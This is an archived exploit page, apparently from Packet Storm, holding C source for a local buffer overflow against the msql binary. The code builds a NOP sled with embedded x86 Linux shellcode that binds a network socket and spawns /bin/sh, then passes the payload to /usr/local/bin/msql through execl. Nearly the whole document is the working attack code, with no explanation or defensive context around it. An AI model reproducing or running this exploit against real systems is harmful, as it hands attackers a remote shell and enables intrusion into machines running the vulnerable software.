Msql local overflow. Author Unknown.
81796ff3a161a4cde169f1cb7ef819ce2c73aa637619778652826eaeb3db1e5d#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#define MSQL_PATH "/usr/local/bin/msql"
#define BUFFER_SIZE 999
#define DEFAULT_OFFSET 0
#define NOP_SIZE 1
char nop[] = "\x90";
char shellcode[] =
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x4c\xeb\x4c\x5e\xb0\x02\x89"
"\x06\xfe\xc8\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb\xfe"
"\xc3\x89\xf1\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x2a\x66"
"\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10"
"\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66"
"\xb3\x04\xcd\x80\xeb\x04\xeb\x48\xeb\x4e\x31\xc0\x89\x46\x04\x89"
"\x46\x08\xb0\x66\xfe\xc3\xcd\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80"
"\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xc7\x06\x2f\x62"
"\x69\x6e\xc7\x46\x04\x2f\x73\x68\x21\x31\xc0\x88\x46\x07\x89\x76"
"\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5f\xff\xff\xff";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc,char **argv)
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int i,off = DEFAULT_OFFSET;
buff = malloc(2048);
ptr = buff;
for (i = 0; i <= BUFFER_SIZE ;i+=NOP_SIZE) {
memcpy (ptr,nop,NOP_SIZE);
ptr+=NOP_SIZE;
}
for(i=0;i < strlen(shellcode);i++)
*(ptr++) = shellcode[i];
addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_sp()+off;
ptr = (char *)addr_ptr;
*ptr = 0;
printf("Using address: 0x%x\n", get_sp);
execl(MSQL_PATH, "msql",buff, NULL);
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed